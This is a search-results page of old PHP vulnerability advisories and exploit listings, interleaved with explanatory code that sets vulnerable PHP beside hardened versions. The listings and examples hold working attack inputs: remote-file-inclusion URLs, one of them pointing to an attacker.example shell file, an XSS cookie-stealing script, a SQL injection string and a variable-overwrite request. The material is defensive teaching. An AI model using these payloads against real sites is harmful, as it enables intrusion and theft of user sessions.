295 matches found
Wordpress default theme XSS (admin) and other problems
There is an XSS in the WordPress default theme. Tested on WordPress version 2.2. Filename: functions.php, line 387. Code: <form style="display: inline" method="post" name="hicolor" id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>"> $_SERVER['REQUEST_URI'] is directly echoed to the user. This problem...
[Full-disclosure] Wordpress default theme XSS (admin) and other problems
There is an XSS in the WordPress default theme. Tested on WordPress version 2.2. Filename: functions.php, line 387. Code: <form style="display: inline" method="post" name="hicolor" id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>"> $_SERVER['REQUEST_URI'] is directly echoed to the user. This problem...
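The pattern behind the two entries above, as an added example that is not WordPress's code: the raw request URI is reflected into a form's action attribute, and a hardened version sits beside it. The function names and the crafted REQUEST_URI value are constructed for illustration; the code assumes, as on Apache with mod_php, that REQUEST_URI is the unmodified request target.

```php
<?php
// Added example; not WordPress's code. It isolates the pattern the advisory
// describes (raw REQUEST_URI reflected into a form's action attribute) and
// puts a hardened version next to it.

// Constructed input: a request path carrying a quote and a script tag. On
// Apache with mod_php, REQUEST_URI is the raw request target, so whatever a
// client sends in the path (crafted link, XHR, non-browser client) arrives
// unchanged.
$_SERVER['REQUEST_URI'] = '/wp-admin/themes.php?page=functions.php&x="><script>alert(document.cookie)</script>';

// Vulnerable: the value is inserted into the attribute without encoding, so a
// double quote in the URI closes the attribute and the rest becomes markup.
function form_open_vulnerable(): string
{
    return '<form style="display: inline" method="post" name="hicolor" id="hicolor" action="'
        . $_SERVER['REQUEST_URI'] . '">';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES turns both " and '
// into entities, so the attribute cannot be terminated early; the browser still
// decodes the entities and posts to the same URL.
function form_open_hardened(): string
{
    $action = htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES, 'UTF-8');
    return '<form style="display: inline" method="post" name="hicolor" id="hicolor" action="'
        . $action . '">';
}

// Simplest fix: an empty action posts back to the current URL and reflects
// nothing at all. Current WordPress also provides esc_attr()/esc_url() for
// the encoding case.
function form_open_no_reflection(): string
{
    return '<form style="display: inline" method="post" name="hicolor" id="hicolor" action="">';
}

// Check: does a live <script> tag survive into the generated markup?
function contains_script_tag(string $html): bool
{
    return stripos($html, '<script>') !== false;
}

echo form_open_vulnerable(), "\n";
echo form_open_hardened(), "\n";
echo form_open_no_reflection(), "\n";
printf("vulnerable reflects a script tag: %s\n", contains_script_tag(form_open_vulnerable()) ? 'yes' : 'no');
printf("hardened reflects a script tag:   %s\n", contains_script_tag(form_open_hardened()) ? 'yes' : 'no');
```

Run it with `php` on the command line; the vulnerable output contains the script element as markup, the hardened output contains it only as `&lt;script&gt;` text inside the attribute value.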
mybloggie-rfi.txt
myBloggie 2.1.5 RFI. Author: Yaser. Homepage: http://www.ayyildiz.org. Download: http://mywebland.com/download.php?id=19. Exploits: http://site/config.php?bloggie_root_path=evilcode? http://site/includes/db.php?bloggie_root_path=evilcode? http://site/includes/template.php?bloggie_root_path=evilcode?...
e-Vision CMS 2.02 - SQL Injection Remote Code Execution
e-Vision CMS 2.02 - SQL Injection Remote Code Execution. #!/usr/bin/php -q -d short_open_tag=on ...need I say more? Bug 2, admin/functions.php: if (isset($_COOKIE['adminlang'])) $languageselector = $_COOKIE['adminlang']; else $languageselector = "en"; include("lang/".$languageselector.".php"); ...speaks for itse...
Particle Gallery <= 1.0.1 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications. Particle Gallery: setvar("COMMENTID", ""); if ($_GET["editcomment"] != "") { $sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($_GET["editcomment"]); $cme = $db->execute($sql); i...
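Why the escaping helper in the Particle Gallery snippet does not help, as an added example that is not the project's code: the value is concatenated unquoted into a numeric comparison, so an injection that contains no quote characters passes an addslashes-style filter untouched. The code models dbSecure() as addslashes() (an assumption; the real helper is not shown), uses a constructed SQLite table with an assumed `pg_` prefix, and shows a bound-parameter version beside it.

```php
<?php
// Added example; not Particle Gallery's code. It models the pattern in the
// snippet: an escaping helper applied to a value that is then concatenated
// UNQUOTED into "WHERE commentid = ...", so escaping quotes changes nothing.

// Assumption: dbSecure() behaves like addslashes(); the real helper is not shown.
function dbSecure(string $s): string
{
    return addslashes($s);
}

$dbprefix = 'pg_';   // assumed table prefix, for illustration only

// Constructed data set in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE {$dbprefix}comments (commentid INTEGER PRIMARY KEY, body TEXT, approved INTEGER)");
$db->exec("INSERT INTO {$dbprefix}comments VALUES (1,'first',1),(2,'moderated, not public',0),(3,'third',1)");

// Vulnerable: escape, then concatenate without quotes. "1 OR 1=1" has no quote
// to escape, so the WHERE clause becomes "commentid = 1 OR 1=1".
function fetch_comment_vulnerable(PDO $db, string $dbprefix, string $editcomment): array
{
    $sql = "SELECT * FROM " . $dbprefix . "comments WHERE commentid = " . dbSecure($editcomment);
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a plain integer id, then bind the
// value so the database never parses it as SQL.
function fetch_comment_hardened(PDO $db, string $dbprefix, string $editcomment): array
{
    if (!ctype_digit($editcomment)) {
        return [];
    }
    $stmt = $db->prepare("SELECT * FROM " . $dbprefix . "comments WHERE commentid = ?");
    $stmt->execute([(int) $editcomment]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id and an injection with no quote characters.
$benign = '1';
$evil   = '1 OR 1=1';

printf("vulnerable, benign: %d row(s)\n", count(fetch_comment_vulnerable($db, $dbprefix, $benign)));
printf("vulnerable, evil:   %d row(s)\n", count(fetch_comment_vulnerable($db, $dbprefix, $evil)));
printf("hardened, benign:   %d row(s)\n", count(fetch_comment_hardened($db, $dbprefix, $benign)));
printf("hardened, evil:     %d row(s)\n", count(fetch_comment_hardened($db, $dbprefix, $evil)));
```

Needs the pdo_sqlite extension. The vulnerable query returns every row, including the non-public one, for the injected input; the hardened version returns exactly one row for the benign id and none for the injection.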
extreme-rfi.txt
Discovered By: HACKERS PAL. Copyright: HACKERS PAL. Website: http://www.soqor.net. Email Address: [email protected]. Tested on 3.0 Pre Final, and other versions should be infected. Script info: Mod Title: Extreme PHPBB 3.0. Mod Version: 3.0 Pre Final. Author: danb00. Demo:...
Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit
Exploit for unknown platform in category web applications. Monster Top List <= 1.4.2 (functions.php root_path) RFI Exploit. #!/usr/bin/perl. Monster Top List <= 1.4.2 remote...
CVE-2007-1409
WordPress allows remote attackers to obtain sensitive information via a direct request for wp-admin/admin-functions.php, which reveals the path in an error message...
CVE-2007-1343
includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...
Remote file inclusion
includes/functions.php in Craig Knudsen WebCalendar before 1.0.5 does not protect the noSet variable from external modification, which allows remote attackers to set arbitrary global variables via a URL with modified values in the noSet parameter, which leads to resultant vulnerabilities that...
CVE-2007-1343
CVE-2007-1343 concerns WebCalendar, a PHP-based calendar app. The vulnerability arises from WebCalendar’s includes/functions.php not protecting the internal variable noSet from external modification, enabling remote attackers to overwrite variables via a URL-modified noSet parameter, which can le...
WebCalendar includes/functions.php noSet Variable Overwrite
The version of WebCalendar installed on the remote host allows an attacker to overwrite the 'noSet' array used by the application to protect selected global variables. By leveraging this issue, an unauthenticated, remote attacker can gain control of protected global variables, which could lead to...
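The mechanism behind the CVE-2007-1343 entries above, as an added example that is not WebCalendar's code: a register_globals-style importer copies request parameters into globals unless their name is on a protection list, and the list itself is not protected, so the attacker overwrites the list first and the protected name second. The function names, the list contents and the request are constructed for illustration.

```php
<?php
// Added example; not WebCalendar's code. It models the importer the entries
// describe: request parameters are copied into globals unless their name is
// in the $noSet protection list, and the list's own name is not in it.

// Names the application never wants set from the request.
$noSet = array('db_login', 'db_password', 'is_admin');

// Constructed attacker request. PHP preserves query-string order, so the first
// parameter replaces the list before the second is checked against it.
$_GET = array(
    'noSet'    => array('nothing'),   // overwrite the protection list itself
    'is_admin' => '1',                // now passes the check against the new list
);

// Vulnerable importer: consults the list by its global name on every iteration
// and does not include 'noSet' (or the superglobals) in it.
function import_globals_vulnerable(array $request): void
{
    foreach ($request as $name => $value) {
        if (!in_array($name, $GLOBALS['noSet'], true)) {
            $GLOBALS[$name] = $value;
        }
    }
}

// Hardened importer: snapshot the list before looping so nothing in the
// request can change it mid-import, and protect the list's own name, GLOBALS
// and the superglobals. The better fix is to not import at all and read
// $_GET['x'] explicitly where the value is needed.
function import_globals_hardened(array $request): void
{
    $protected = array_merge(
        $GLOBALS['noSet'],
        array('noSet', 'GLOBALS', '_GET', '_POST', '_COOKIE', '_REQUEST', '_SERVER', '_ENV', '_FILES', '_SESSION')
    );
    foreach ($request as $name => $value) {
        if (!is_string($name) || in_array($name, $protected, true)) {
            continue;
        }
        $GLOBALS[$name] = $value;
    }
}

// Run an importer against a fresh global state and report what the protected
// $is_admin flag ends up as.
function admin_flag_after(callable $importer, array $request): string
{
    $GLOBALS['noSet']    = array('db_login', 'db_password', 'is_admin');
    $GLOBALS['is_admin'] = '0';
    $importer($request);
    return (string) $GLOBALS['is_admin'];
}

printf("vulnerable importer: is_admin=%s\n", admin_flag_after('import_globals_vulnerable', $_GET));
printf("hardened importer:   is_admin=%s\n", admin_flag_after('import_globals_hardened', $_GET));
```

With the vulnerable importer the flag ends up as the attacker's value; with the hardened one it stays at its initial value, because `noSet` is skipped and `is_admin` is still checked against the original list.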
CVE-2007-1230
Multiple cross-site scripting (XSS) vulnerabilities in wp-includes/functions.php in WordPress before 2.1.2-alpha allow remote attackers to inject arbitrary web script or HTML via (1) the Referer HTTP header or (2) the URI, a different vulnerability than CVE-2007-1049...
WordPress <= 2.1.1 - Multiple XSS
Because of these vulnerabilities in wp-includes/functions.php, attackers can inject arbitrary web script or HTML. Solution: update WordPress to the latest available version (at least 2.1.2)...
Sql injection
Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) 1.00 allow remote attackers to execute arbitrary SQL commands via the id parameter to the (1) updateRow and (2) deleteRow functions in functions.php. NOTE: some of these details are obtained...
Remote file inclusion
PHP remote file inclusion vulnerability in functions.php in Extreme phpBB (aka phpBB Extreme) 3.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter...
Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit
Exploit for unknown platform in category web applications. Extreme phpBB 3.0.1 (functions.php) Remote File Include Exploit. (C) xoron. Name: phpBB Extreme 3.0.1 phpbb_root_path...
Extreme phpBB 3.0.1 - functions.php Remote File Inclusion
Extreme phpBB 3.0.1 - functions.php Remote File Inclusion. (C) xoron. Name: phpBB Extreme 3.0.1 phpbb_root_path Remote File Include Exploit. Author: xoron. Exploit coded by xoron. Download: http://sourceforge.net/project/showfiles.php?group_id=95900. Thanks: pang0, DJR. POC:...
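The two include patterns shared by the myBloggie, Monster Top List and Extreme phpBB entries (a request-controlled path prefix) and the e-Vision CMS entry (a cookie-controlled file name), as one added example that is not code from any of those projects. It builds the include paths instead of calling include so it runs anywhere; the attacker inputs, function names and the shipped-language list are constructed for illustration.

```php
<?php
// Added example; not code from myBloggie, e-Vision CMS, Extreme phpBB or
// Monster Top List. It reproduces the two include patterns those entries share
// and puts a hardened form next to each. All inputs are constructed.

// --- Pattern 1: path prefix from the request (root_path / bloggie_root_path / phpbb_root_path) ---

// The trailing "?" turns the rest of the include path into a query string for
// the attacker's server, so the include fetches shell.txt. This needs
// allow_url_include=On (allow_url_fopen on PHP before 5.2) and a prefix
// variable that is not initialised before the include.
$_GET['root_path'] = 'http://attacker.example/shell.txt?';

function include_path_vulnerable(): string
{
    // register_globals did this assignment implicitly; old code often also
    // did it explicitly "for flexibility".
    $root_path = $_GET['root_path'];
    return $root_path . 'includes/functions.php';
}

function include_path_hardened(): string
{
    // Derive the prefix from the script's own location; nothing from the
    // request can reach the path.
    return __DIR__ . '/includes/functions.php';
}

// --- Pattern 2: file name from a cookie (admin language selector) ---

// ".php" is appended, so the attacker needs a file ending in .php somewhere
// on disk (an uploaded avatar with a .php name, for instance) or, on PHP
// before 5.3.4, a null byte to cut the suffix off.
$_COOKIE['adminlang'] = '../../uploads/avatar_1337';

function lang_include_vulnerable(string $cookie): string
{
    return 'lang/' . $cookie . '.php';
}

// Allowlist: a strict syntax check, then membership in the set of languages
// actually shipped. Anything else falls back to the default.
function lang_include_hardened(string $cookie, array $shipped): string
{
    if (preg_match('/^[a-z]{2}(?:_[A-Z]{2})?$/', $cookie) === 1 && in_array($cookie, $shipped, true)) {
        return 'lang/' . $cookie . '.php';
    }
    return 'lang/en.php';
}

// In a real deployment build this from the directory, e.g.
// array_map(fn($f) => basename($f, '.php'), glob(__DIR__ . '/lang/*.php'));
$shipped_languages = array('en', 'de', 'fr');

echo "vulnerable include: ", include_path_vulnerable(), "\n";
echo "hardened include:   ", include_path_hardened(), "\n";
echo "vulnerable lang:    ", lang_include_vulnerable($_COOKIE['adminlang']), "\n";
echo "hardened lang:      ", lang_include_hardened($_COOKIE['adminlang'], $shipped_languages), "\n";
echo "hardened lang (de): ", lang_include_hardened('de', $shipped_languages), "\n";
```

Independently of the code fix, `allow_url_include=Off` (the PHP default) closes the remote case for the whole server, and `register_globals=Off` removes the implicit assignment that made the uninitialised prefix variable attacker-controlled.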